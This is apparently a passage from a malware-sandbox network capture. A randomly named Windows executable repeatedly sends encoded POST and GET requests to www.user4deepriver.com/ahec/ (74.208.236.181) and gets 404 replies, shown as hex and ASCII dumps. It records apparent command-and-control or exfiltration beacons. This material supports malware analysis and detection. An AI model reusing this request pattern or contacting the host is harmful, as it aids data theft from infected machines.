                                                                                                                                                            Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                            Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            2192.168.2.44974174.208.236.181805016C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Dec 8, 2023 14:50:37.526036978 CET779OUTPOST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.user4deepriver.com
                                                                                                                                                            Origin: http://www.user4deepriver.com
                                                                                                                                                            Referer: http://www.user4deepriver.com/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 209
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Raw: 58 76 65 58 48 5a 76 78 3d 77 6d 65 50 2b 49 44 38 61 47 58 35 77 48 6c 35 5a 67 6f 66 35 52 49 77 43 4f 45 69 39 50 68 51 44 54 74 4f 64 74 4c 4a 43 6e 6c 30 69 6d 58 4d 49 36 56 53 5a 50 61 74 69 71 54 68 62 7a 6e 7a 35 71 7a 55 67 6f 44 69 69 64 56 37 50 70 44 74 57 6c 5a 42 53 54 51 31 72 52 35 48 58 6d 6f 4b 61 6d 67 6e 52 66 58 6d 54 34 46 53 33 68 48 64 38 76 42 6a 50 77 35 52 6a 77 75 73 48 69 43 70 31 64 6f 79 63 63 6c 6a 73 53 2b 43 6e 68 49 78 61 44 6a 37 68 45 6f 5a 30 34 38 61 63 74 4a 4a 74 45 62 6a 69 77 55 54 75 52 5a 4e 43 58 64 51 46 4b 54 4b 58 64 6e 79 6d 4d 43 6b 4d 79 6a 2b 31 76 59 59 53 62 77 3d
                                                                                                                                                            Data Ascii: XveXHZvx=wmeP+ID8aGX5wHl5Zgof5RIwCOEi9PhQDTtOdtLJCnl0imXMI6VSZPatiqThbznz5qzUgoDiidV7PpDtWlZBSTQ1rR5HXmoKamgnRfXmT4FS3hHd8vBjPw5RjwusHiCp1doyccljsS+CnhIxaDj7hEoZ048actJJtEbjiwUTuRZNCXdQFKTKXdnymMCkMyj+1vYYSbw=
                                                                                                                                                            Dec 8, 2023 14:50:37.699758053 CET580INHTTP/1.1 404 Not Found
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:50:37 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                            Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                            Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            3192.168.2.44974274.208.236.181805016C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Dec 8, 2023 14:50:40.213336945 CET10861OUTPOST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.user4deepriver.com
                                                                                                                                                            Origin: http://www.user4deepriver.com
                                                                                                                                                            Referer: http://www.user4deepriver.com/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 10289
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Raw: 58 76 65 58 48 5a 76 78 3d 77 6d 65 50 2b 49 44 38 61 47 58 35 77 48 6c 35 5a 67 6f 66 35 52 49 77 43 4f 45 69 39 50 68 51 44 54 74 4f 64 74 4c 4a 43 6e 74 30 6c 51 6a 4d 49 5a 39 53 59 50 61 74 6f 4b 54 6b 62 7a 6d 7a 35 71 36 66 67 6f 50 74 69 66 64 37 50 4c 4c 74 53 68 74 42 62 54 51 31 6d 78 35 58 54 6d 6f 6c 61 6d 78 76 52 65 6e 6d 54 34 46 53 33 69 66 64 36 2b 42 6a 4e 77 35 57 6b 77 75 34 51 79 43 52 31 64 42 46 63 63 78 5a 73 69 65 43 67 41 34 78 57 58 44 37 6f 45 6f 58 33 34 38 53 63 74 46 57 74 45 33 6e 69 30 63 31 75 54 46 4e 42 7a 77 5a 51 4a 76 74 47 66 6e 76 77 74 53 4a 4d 31 4b 71 69 76 6f 73 48 73 45 31 44 45 65 2b 6e 77 75 73 71 53 44 5a 38 6d 67 6b 44 56 35 48 78 50 72 67 6d 6a 36 2f 56 46 63 55 49 6e 55 49 72 6a 69 2f 6d 66 58 2f 72 2f 6b 6e 4a 4f 62 47 48 39 72 77 4c 34 4e 64 50 66 6b 6a 64 36 51 43 6a 4a 4e 49 59 33 77 30 72 39 75 68 6e 6a 6f 65 50 4d 36 45 77 75 6d 74 77 70 57 50 2f 75 57 2b 68 75 78 6c 73 44 46 67 61 31 61 6f 4d 77 39 71 30 35 78 79 49 66 47 31 2f 4c 79 53 30 57 76 2f 64 62 35 67 59 34 32 67 59 67 54 78 4b 4f 71 65 6d 6d 69 55 31 51 36 52 36 42 51 54 52 58 6c 70 61 77 55 50 42 43 45 5a 30 44 6e 38 6f 30 6f 34 78 5a 43 6f 36 79 55 56 4c 31 47 62 4d 48 4e 74 5a 71 67 7a 71 6a 2b 57 41 5a 41 7a 75 6d 64 64 6d 47 6c 4d 47 77 72 50 5a 53 55 56 79 43 2b 59 53 42 42 48 71 44 42 56 50 70 6f 2f 61 2f 54 42 48 65 2b 4d 70 62 4a 67 46 69 4f 75 62 54 61 2b 57 75 65 2f 44 4e 78 52 59 31 4e 61 53 33 79 73 79 54 66 67 46 44 48 4a 51 4c 53 77 77 5a 46 58 37 7a 31 2f 7a 7a 68 42 41 71 6a 79 4c 52 39 59 39 71 72 71 5a 42 74 38 79 48 4a 58 6a 2b 33 79 52 69 35 31 74 57 65 72 4b 49 76 43 36 62 55 77 74 53 76 56 78 53 32 67 59 35 4d 34 67 38 38 79 77 39 45 6f 42 51 59 49 78 77 51 62 61 4d 41 4f 4d 4b 64 4b 6a 30 58 68 57 37 5a 66 62 53 42 52 35 62 47 72 39 46 6a 2f 68 7a 41 34 6f 47 63 75 69 4a 6b 75 53 48 6f 6f 64 64 64 48 4b 59 58 44 2b 37 64 6e 42 67 45 78 45 44 49 65 4e 32 45 2f 79 51 57 49 69 52 49 51 35 30 48 73 4e 52 30 31 32 34 4e 45 6e 4e 4d 6a 48 58 76 76 4f 74 6c 36 54 34 36 30 33 4d 70 37 54 49 53 51 69 2b 4b 7a 4e 31 56 61 71 31 31 6b 57 6f 66 67 43 6f 58 65 62 64 35 79 51 52 6e 58 4e 73 36 6d 4c 54 32 65 50 6b 61 2f 6b 52 63 56 4d 56 4f 39 48 78 35 55 55 42 53 6b 38 73 37 57 38 58 76 30 6c 56 64 4a 4e 61 50 6e 39 67 48 4b 70 48 44 76 71 50 34 50 44 75 39 6e 70 43 37 6e 6e 49 4a 2b 44 57 71 56 2f 77 7a 57 72 44 50 57 33 76 59 6e 38 31 56 6b 69 7a 52 71 4e 4a 43 56 49 57 73 51 7a 76 57 6f 71 78 44 72 4b 4c 37 52 62 65 6d 4d 53 66 4a 75 39 55 6a 45 57 70 39 43 76 39 34 73 6b 6d 47 63 4b 58 30 44 68 45 4b 6c 44 4f 35 54 51 61 33 44 77 53 41 30 4c 4b 47 65 4c 4a 65 72 52 68 7a 58 6c 44 50 5a 55 6c 7a 69 69 66 78 59 79 67 6a 31 2f 43 62 55 4c 6b 2b 56 30 33 64 37 35 6b 36 78 4b 50 61 58 45 64 35 4e 43 75 68 66 70 2f 64 50 4e 37 4e 47 44 61 59 64 7a 4a 6a 76 67 71 71 74 41 6c 78 6f 4d 75 74 33 6c 66 48 51 4f 62 32 78 50 69 6a 4d 53 76 2f 4a 50 54 36 35 6e 69 6c 78 4d 46 37 64 4d 6a 64 4f 62 54 2f 42 73 44 45 72 79 70 52 49 44 46 78 79 56 46 36 6f 57 6a 50 2b 37 6f 6f 72 33 6f 67 52 68 4b 48 6f 2f 64 55 44 7a 49 49 71 54 34 45 66 6f 55 41 75 75 6e 61 6b 55 65 51 33 38 65 30 64 4e 77 2b 4b 4e 56 4d 62 64 46 4b 31 69 2b 73 4e 61 38 6a 69 7a 52 6a 48 71 70 61 69 6c 59 76 6e 6b 4c 6b 42 57 4d 43 4c 73 44 39 78 42 7a 54 51 4d 38 52 57 72 69 77 6e 42 67 51 6a 6c 4d 50 6d 36 31 63 59 6c 72 46 4a 56 31 59 6c 67 71 66 55 55 4d 4e 32 56 71 57 34 75 6a 41 30 4d 72 2f 42 38 54 79 4f 45 56 46 44 79 6a 6f 4d 62 58 45 30 41 4b 6c 4d 35 69 4b 4e 6f 4e 6a 76 64 75 72 75 76 6a 7a 50 7a 43 51 35 6e 4d 57 34 2b 56 53 63 55 47 6e 52 6a 2f 2f 55 41 70 72 32 41 4d 69 69 4c 71 70 76 4b 75 75 78 78 31 69 35 79 38 6e 32 6f 79 77 42 4c 6a 41 77 65 53 79 43 39 67 4e 75 61 41 53 6b 79 44 66 64 57 52 77 45 55 7a 49 55 4a 52 61 68 72 37 71 33 48 72 37 39 74 51 49 36 62 6c 6f 45 4d 51 79 69 65 39 73 74 35 63 6b 4c 6f 6f 2b 6d 41 62 5a 34 55 45 49 65 62 2b 45 78 34 4f 30 53 45 35 34 58 41 41 65 72 41 37 71 79 4a 77 35 4c 68 6c 68 57 33 76 2f 43 31 32 69 70 70 75 4c 2f 41 65 4d 61 71 4e 34 41 6c 77 63 41 73 70 44 62 67 39
                                                                                                                                                            Data Ascii: XveXHZvx=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
                                                                                                                                                            Dec 8, 2023 14:50:40.387168884 CET580INHTTP/1.1 404 Not Found
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:50:40 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                            Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                            Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            4192.168.2.44974374.208.236.181805016C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Dec 8, 2023 14:50:42.900471926 CET476OUTGET /ahec/?XveXHZvx=9k2v98v8fW7x5mt2TD9N5hM0Gp49wMZ6NgJCH+u8B3tf6gDcFaFwcfLjsp7tbCeN6M+Gl5HR8oN4IorBb0pnZhULhTE/SFE2Bw==&l4xX=rDStpH0He HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Host: www.user4deepriver.com
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Dec 8, 2023 14:50:43.073848963 CET770INHTTP/1.1 404 Not Found
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 626
                                                                                                                                                            Connection: close
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:50:42 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 